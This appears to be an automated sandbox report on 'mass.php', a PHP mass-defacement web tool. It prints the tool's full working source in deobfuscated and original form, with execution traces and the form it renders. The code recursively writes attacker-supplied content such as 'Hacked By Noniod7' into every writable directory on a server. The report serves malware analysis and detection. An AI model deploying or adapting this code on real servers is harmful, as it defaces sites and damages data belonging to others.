PHP Malware Analysis
mass.php
md5: 7cfbf6c34eca59e7e7e38e198e43d06b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- file_put_contents (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if ($_GET['to'] == 'mass') {
function sabun_massal($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] {$lokasi}<br>";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc, $namafile, $isi_script);
}
}
}
}
}
}
}
function sabun_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] {$dirb}/{$namafile}<br>";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe_sabun'] == 'murah') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<center>";
echo "<form method='post'>\t<font style='text-decoration: underline;'>Tipe Mass:</font><br>\t<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\t<font style='text-decoration: underline;'>Folder:</font><br>\t<input type='text' name='d_dir' value='{$dir}' style='width: 450px;' height='10'><br>\t<font style='text-decoration: underline;'>Filename:</font><br>\t<input type='text' name='d_file' value='icq.htm' style='width: 450px;' height='10'><br>\t<font style='text-decoration: underline;'>Index File:</font><br>\t<textarea name='script' style='width: 450px; height: 200px;'>Hacked By Noniod7</textarea><br>\t<input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'>\t</form></center>";
}Execution traces
data/traces/7cfbf6c34eca59e7e7e38e198e43d06b_trace-1676238619.9739.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:50:45.871755]
1 0 1 0.000242 393512
1 3 0 0.000371 407664 {main} 1 /var/www/html/uploads/mass.php 0 0
1 3 1 0.000416 407664
0.000444 323024
TRACE END [2023-02-12 19:50:45.872010]
Generated HTML code
<html><head></head><body><center><form method="post"> <font style="text-decoration: underline;">Tipe Mass:</font><br> <input type="radio" name="tipe_sabun" value="murah" checked="">Biasa<input type="radio" name="tipe_sabun" value="mahal">Massal<br> <font style="text-decoration: underline;">Folder:</font><br> <input type="text" name="d_dir" value="" style="width: 450px;" height="10"><br> <font style="text-decoration: underline;">Filename:</font><br> <input type="text" name="d_file" value="icq.htm" style="width: 450px;" height="10"><br> <font style="text-decoration: underline;">Index File:</font><br> <textarea name="script" style="width: 450px; height: 200px;">Hacked By Noniod7</textarea><br> <input type="submit" name="start" value="HAJAR COK!" style="width: 450px;"> </form></center></body></html>Original PHP code
<?php
if($_GET['to'] == 'mass') { function sabun_massal($dir,$namafile,$isi_script){ if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)){ if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $lokasi<br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } }} function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } } else { echo "<center>"; echo "<form method='post'> <font style='text-decoration: underline;'>Tipe Mass:</font><br> <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br> <font style='text-decoration: underline;'>Folder:</font><br> <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br> <font style='text-decoration: underline;'>Filename:</font><br> <input type='text' name='d_file' value='icq.htm' style='width: 450px;' height='10'><br> <font style='text-decoration: underline;'>Index File:</font><br> <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Noniod7</textarea><br> <input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'> </form></center>"; }
?>